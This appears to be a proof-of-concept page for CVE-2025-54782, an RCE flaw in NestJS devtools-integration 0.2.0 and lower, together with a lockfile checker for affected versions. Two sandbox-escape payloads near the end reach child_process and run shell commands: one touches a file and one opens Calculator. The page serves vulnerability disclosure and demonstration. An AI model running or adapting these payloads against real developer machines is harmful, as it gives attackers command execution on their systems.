NestJS Inspector Payload

This is a proof of concept for the CVE-2025-54782 RCE vulnerability in NestJS Inspector.

Read more: https://socket.dev/blog/nestjs-rce-vuln

Read more: https://github.com/nestjs/nest/security/advisories/GHSA-85cg-cmq5-qjm7

These payloads run if @nestjs/devtools-integration 0.2.0 or lower is installed and running.

Note: An attacker would run these payloads automatically on page load. The button click is only for demonstration purposes.
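
A lockfile check for the version condition stated above, added here as an example; it is not code from the original page or from the NestJS project. It takes an already parsed package-lock.json object; the sample lockfile, its version numbers and the package name some-tool are constructed for illustration.

```javascript
// Added example: flag lockfile entries for @nestjs/devtools-integration at or below 0.2.0.
const PKG = '@nestjs/devtools-integration';
const LAST_AFFECTED = [0, 2, 0]; // from the page: "0.2.0 or lower"

// True when the version is <= 0.2.0 (prereleases of 0.2.0 included).
// Unparseable versions (git URLs, tags, missing) count as affected so a human reviews them.
function isAffected(version) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)(?:[-+].*)?$/.exec(String(version).trim());
  if (!m) return true;
  const core = [Number(m[1]), Number(m[2]), Number(m[3])];
  for (let i = 0; i < 3; i++) {
    if (core[i] !== LAST_AFFECTED[i]) return core[i] < LAST_AFFECTED[i];
  }
  return true;
}

// Collect every installed copy of the package, including nested (transitive) ones.
function findInstalls(lock) {
  const hits = [];
  // lockfileVersion 2/3: flat "packages" map keyed by install path.
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    if (path === `node_modules/${PKG}` || path.endsWith(`/node_modules/${PKG}`)) {
      hits.push({ path, version: meta.version, dev: Boolean(meta.dev) });
    }
  }
  // lockfileVersion 1: nested "dependencies" tree, walked only when "packages" is absent.
  const walk = (deps, trail) => {
    for (const [name, meta] of Object.entries(deps || {})) {
      const path = `${trail}node_modules/${name}`;
      if (name === PKG) hits.push({ path, version: meta.version, dev: Boolean(meta.dev) });
      walk(meta.dependencies, `${path}/`);
    }
  };
  if (!lock.packages) walk(lock.dependencies, '');
  return hits.map((h) => ({ ...h, affected: isAffected(h.version) }));
}

// Constructed sample lockfile (not taken from any real project).
const sampleLock = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', version: '1.0.0' },
    'node_modules/@nestjs/devtools-integration': { version: '0.1.5', dev: true },
    'node_modules/some-tool/node_modules/@nestjs/devtools-integration': { version: '0.3.0' },
    'node_modules/@nestjs/core': { version: '10.0.0' },
  },
};

console.log(JSON.stringify(findInstalls(sampleLock), null, 2));
```

To check a real project, pass the result of JSON.parse on its package-lock.json to findInstalls. The dev flag shows whether a copy is recorded as a development-only dependency.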

Simple console.log payload

This will log "hello" to the console. This does not require bypassing the sandbox.

Touch file

This will execute the touch command in the project's root directory. This payload requires bypassing the sandbox.

This is the payload being executed:

(function() { try{ propertyIsEnumerable.call(); } catch(pp){ pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag.txt'); } })()

Pop Calculator (Mac only)

This will open the calculator app on a Mac.

This payload requires bypassing the sandbox.

This is the payload being executed:

(function() { try{ propertyIsEnumerable.call(); } catch(pp){ pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('open /System/Applications/Calculator.app'); } })()